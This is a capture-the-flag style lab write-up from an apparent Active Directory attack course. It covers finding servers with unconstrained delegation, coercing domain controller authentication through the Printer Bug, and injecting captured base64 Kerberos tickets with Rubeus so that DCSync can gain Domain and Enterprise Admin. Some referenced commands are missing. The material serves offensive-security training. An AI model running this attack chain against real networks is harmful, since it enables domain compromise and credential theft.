1 - Find a server in the dcorp domain where Unconstrained Delegation is enabled
2 - Compromise the server and escalate to Domain Admin privileges
3 - Escalate to Enterprise Admins privileges by abusing Printer Bug
Flag 24 [dcorp-appsrv] - Domain user who is a local admin on dcorp-appsrv 🚩
Flag 25 [dcorp-appsrv] - Which user's credentials are compromised by using the printer bug for compromising dollarcorp 🚩
Solutions
1 - Find a server in the dcorp domain where Unconstrained Delegation is enabled
Starting to find a server that has unconstrained delegation enabled:
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
. C:\AD\Tools\PowerView.ps1
Get-DomainComputer -Unconstrained | select -ExpandProperty name
DCORP-DC
DCORP-APPSRV
2 - Compromise the server and escalate to Domain Admin privileges
Remembering that the prerequisite for elevation using Unconstrained delegation is having admin access to the machine, we need to compromise a user which has local admin access on appsrv.
We extracted secrets of appadmin, srvadmin and websvc from dcorp-adminsrv. Let's check if anyone of them have local admin privileges on dcorp-appsrv.
First, we will try with appadmin. Run the below command from an elevated command prompt:
Now, we can use the Printer Bug for Coercion, so on the student VM, use MS-RPRN to force authentication from dcorp-dc$ (remember to charge program into HFS every time)
Copy the base64 encoded ticket and use it with Rubeus on student VM. Run the below command from an elevated shell as the SafetyKatz command that we will use for DCSync needs to be run from an elevated process:
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args ptt /ticket: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
3 - Escalate to Enterprise Admins privileges by abusing Printer Bug
To get Enterprise Admin privileges, we need to force authentication from mcorp-dc. Run the below command to listern for mcorp-dc$ tickets on dcorp-appsrv:
As previously, copy the base64 encoded ticket and use it with Rubeus on student VM. Run the below command from an elevated shell as the SafetyKatz command that we will use for DCSync needs to be run from an elevated process:
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args ptt /ticket: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